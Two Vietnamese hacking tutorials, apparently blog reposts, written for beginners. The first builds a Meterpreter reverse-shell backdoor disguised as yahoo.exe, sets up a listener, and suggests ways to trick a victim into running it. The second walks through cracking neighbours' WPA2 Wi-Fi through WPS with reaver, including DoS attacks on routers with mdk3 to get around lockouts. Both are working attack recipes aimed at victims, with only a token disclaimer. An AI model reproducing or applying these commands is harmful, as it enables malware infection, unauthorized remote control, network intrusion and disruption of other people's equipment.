Hướng dẫn tạo virus backdoor trong Backtrack 5 R3 (Clip)

Buồn tình nên ngồi viết tut này và làm clip demo chia sẻ cho anh em, ắt hẳn việc tạo 1 con virus đối với các beginer hoặc IT network không có kiến thức lập trình là 1 điều vô cùng khó, chưa kể nếu lấy các con virus được chia sẻ trên mạng, chúng ta cũng sẽ chẳng biết chúng ta có trở thành nạn nhân của người chủ con virus đó không.

Vì thế, hôm nay mình sẽ hướng dẫn các bạn cách tạo 1 con backdoor  trong Backtrack 1 cách vô cùng đơn giản, không cần kiến thức lập trình gì cả, và con virus này cũng do chính bạn tạo ra nên bạn không phải lo lắng về việc trở thành nạn nhân của ai cả. Trong bài viết này mình chỉ hướng dẫn trong mạng Lan, còn muốn dùng trên internet thì bạn chỉ việc đổi IP private của host thành IP public là được.

Trước hết Backdoor là gì, backdoor đơn giản là  loại virus có tác dụng mở cổng kết nối tới nạn nhân nhằm lấy thông tin cá nhân trên máy nạn nhân hoặc điều khiển máy nạn nhân phục vụ cho việc triển khai tấn công DDos tới các nạn nhân khác. Khi nạn nhân đã thực thi file virus, bạn hầu như có thể chiếm quyền điều khiển toàn diện của máy nạn nhân tùy vào khả năng của bạn.

Trước khi bắt đầu vào làm, mình cũng xin nhắc lại, bài viết mang tính chất thảm khảo và nghiên cứu, vọc phá, không dành cho mục đích xấu, nên mong các bạn cân nhắc trước khi làm chuyện phạm pháp. Và mình sẽ chỉ hỗ trợ cho các bạn đã có kiến thức nhưng làm chưa ra, các câu hỏi vô nghĩa như “bạn hack dùm mình được không, bạn chỉ mình làm với, bạn hướng dẫn chi tiết cho mình với…..bla..bla..bla” thì mình xin phép không trả lời.

Bắt tay vào làm thôi, đầu tiên dùng lệnh ifconfig kiểm tra IP của máy Backtrack, ở đây IP máy backtrack là 192.168.1.4

Tiếp theo, dùng câu lệnh sau để tạo con Backdoor  với tên yahoo.exe

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=4444 x > /root/Desktop/yahoo.exe

Trong đó, LHOST là địa chỉ IP máy host (backtrack)

LPORT là cổng mà chúng ta kết nối với nạn nhân

Đây là file yahoo.exe mà ta vừa tạo ra

Giờ ta sẽ bật chế độ lắng nghe để chờ con mồi sập  bẫy thôi, ta chạy 2 câu lệnh sau để chuyển tới thư mục framework để chạy chế độ msfconsole

cd /pentest/exploit/framwork
./msfconsole

Trong chế độ msfconsole, chúng ta chạy các câu lệnh sau thì bắt đầu mở cổng ngồi đợi..:)

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.4
set LPORT 4444
set channel 1
exploit

Giờ mình sẽ gửi file đó qua cho nạn nhân ở máy xp

Sau khi nạn nhân chạy file yahoo.exe, bên máy backtrack, bạn sẽ thấy chúng ta đã kết nổi tới được máy nạn nhân như trong hình

Thế là xong rồi đó, mình sẽ sử dụng 1 số câu lệnh để xem máy nạn nhân trong môi trường DOS

sysinfo (để xem thông tin máy nạn nhân)

Shell ( để vào môi trường DOS trên máy nạn nhân)

Tới đây xem như là bạn đã chiếm được quyền điều khiển của máy nạn nhân rồi đó, chỉ còn tùy thuộc vào khả năng sử dụng DOS của bạn như thế nào thôi.
Còn con virus, bạn tự nghĩ cách làm sao để dụ dỗ nạn nhân click vào nhé, tùy khả năng lừa tình của bạn…^^, ví dụ: bạn có thể combine với 1 phần mềm nào đó.
À, lưu ý, nếu máy nạn nhân có phần mềm diệt virus thì virus ko có tác dụng, nếu bạn muốn vượt mặt được phần mềm diệt virus, hãy chịu khó nghiên cứu thêm, có thời gian mình sẽ viết tut hướng dẫn sau.

Đây là clip làm hoàn chỉnh của mình cho các bạn dễ hình dung.

Nguồn: http://tranminhtuyen.wordpress.com/2014/03/14/huong-dan-tao-virus-backdoor-trong-backtrack-5-r3-clip/

Hướng dẫn hack pass wifi WPA2

Chuẩn WPA2 là chuẩn mà đa số các access point hỗ trợ và cũng là chuẩn khó bị crack nhất, trên mạng cũng khá nhiều bài viết hướng dẫn, nay mình sẽ hướng dẫn chi tiết cho cả beginer và cả những người đã biết sử dụng linux hiểu được cách thức hoạt động của reaver vàaircrack.

Mình đã test và chạy ok trên Ubuntu 11.10 nhưng vì nếu chạy trên Ubuntu các bạn phải cài aircrack và reaver khá là phức tạp đối với những bạn mới vì thế mình hướng dẫn trên backtrack OS cho tiện vì nó là OS dành cho các hacker và đã cài sẵn hết tất cả các tool đó rồi.

Đầu tiên các bạn down bản Backtrack 5 R3 về (vào google mà tìm), sau đó burn ra đĩa DVD để chạy boot live. Có nhiều bài hướng dẫn chạy trên VMware cũng được nhưng mình thử trên máy mình thì VMware ko nhận card wifi còn boot live thì nhận.

Các bạn boot vào đĩa, xong chọn dòng đầu tiên enter, vào màn hình root các bạn nhập startx và enter để vào giao diện đồ họa.

Trong giao diện đồ họa mở terminal bằng Alt + Ctr + T, sau đó gõ lệnh airmon-ng start wlan0 để kích hoạt card mạng wifi

 Các bạn thấy ở đây mình có 1 card wifi và cổng để monitor là mon0, ta sẽ dùng cổng này để tìm các SSID của các wifi khác.

Ta dùng lệnh airodump-ng mon0 để tìm SSID.

Sau đó, nó sẽ dò ra tất cả các mạng wifi của nhà hàng xóm hay quán cafe gần nhà bạn đang bật, ở đây chúng ta sẽ copy lại SSID mà chúng ta muốn hack pass.

Tiếp theo ta sẽ dùng lệnh reaver -i mon0 -b SSID -vv (2 chữ v, ko phải chữ w, SSID là các thông số lúc này copy), lúc này nó sẽ dùng cơ chế Brute force để tìm mã pin, từ mã pin nó sẽ dò tiếp mã PSK, thời gian tìm hơi bị lâu có thể 9-10 tiếng là bình thường tùy vào cấu hình máy và mã PSK do đối phương đặt có phức tạp hay không, cộng thêm 1 chút may mắn nữa là ok.

Sau khi tìm xong nó sẽ kết thúc giống hình dưới đây, ta thu được mã PIN và PSK để đăng nhập và wifi.

Tất nhiên là không phải lúc nào cũng thành công, sẽ có những wifi hack không được và có cái hack được, quan trọng là có đủ kiên nhẫn và chịu khó hay không, và cũng hy vọng mọi người không dùng cái này đi quậy phá router wifi người khác, hack lấy pass để cho bik và có wifi xài ké thôi..:)

Nếu các bạn gặp khúc mắc hoặc muốn hiểu rõ hơn có thể đọc tài liệu 802.11 hacking để biết thêm các có chế hoạt động của wifi. Good luck.

P/s: 1 vài điểm cần lưu ý

Muốn hack được pass wifi thì AP phải enable tính năng WPS.

Lệnh xem AP có enable WPS không

wash -i mon0 

Nếu ở cột WPS Locked có hiện chứ YES hoặc NO là có enable, còn để trống là không có.

YES là bị lock rồi, phải DOS nó để nó chuyển về NO là crack được.

Lệnh dos

mdk3 mon0 a -a BSSID

Kinh nghiệm khi xuất hiện 3 lỗi sau do 1 bạn trong HVA online chia sẽ:

Trong quá trình crack password (chạy lệnh reaver) nếu xuất hiện một trong ba dòng sau:

a/ WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking thì Modem bị tấn công có phần tự động phát hiện và chống crack password theo cách này. Nếu mạng Wi-Fi lúc đầu chưa crack có WPS Locked là No nhưng đang crack thì chuyển sang Yes => dùng lệnh DoS tấn công để Modem bị quá tải và buộc phải restart, nhờ đó có thể chuyển WPS Locked về lại No như trước để tiếp tục crack, câu lệnh là: mdk3 mon0 a -a BSSID. Với trường hợp này, thì nên chuyển sang giao diện đồ họa để có thể mở đồng thời nhiều cửa sổ giao diện gõ dòng lệnh khi vừa tấn công DoS Modem vừa muốn kiểm tra xem Modem đã chuyển WPS Locked về lại No hay chưa.

b/ WARNING: Failed to associate with BSSID (ESSID: Tên mạng Wi-Fi) thì có 4 khả năng sau xảy ra:
+ Modem bị tấn công DoS đã treo.
+ Modem bị tấn công đã tắt WPS.
+ Sóng Wi-Fi yếu, chập chờn do môi trường có nhiều vật cản.
+ Modem bị tấn công đã lọc MAC hoặc/và ẩn ESSID để phòng chống crack password theo cách này.
=> Không crack password mạng Wi-Fi đó nữa cho khỏi mất công (Với ba trường hợp sau)! Tiếp tục crack password mạng Wi-Fi với trường hợp đầu như sau: dừng chạy lệnh mdk3 (đã nói ở trên), chờ một lúc (0,25 đến 0,5 giờ) thì reaver sẽ làm việc tiếp tục bình thường do Modem tự hồi phục được lỗi này!

c/ WARNING: Receive timeout occurred => Modem bị tấn công DoS đã treo! Tiếp tục crack password mạng Wi-Fi như sau: tiếp tục chạy lệnh mdk3 cho tới khi chạy lại lệnh reaver gặp thông báo như trường hợp b thì dừng lại, hoặc chờ một lúc (0,25 đến 0,5 giờ) thì reaver sẽ làm việc tiếp tục bình thường do Modem tự hồi phục được lỗi này!

PS: Để crack hiệu quả thì nên boot từ DVD để vào BackTrack trên máy thật chứ không nên xài máy ảo! Ngoài ra nên chọn thời điểm crack vào ban đêm hoặc sáng sớm vì không có người xài mạng Wi-Fi sẽ không bị lỗi khi chạy reaver, mdk3, etc

nguồn: http://tranminhtuyen.wordpress.com/2013/07/04/huong-dan-hack-pass-wifi-wpa2/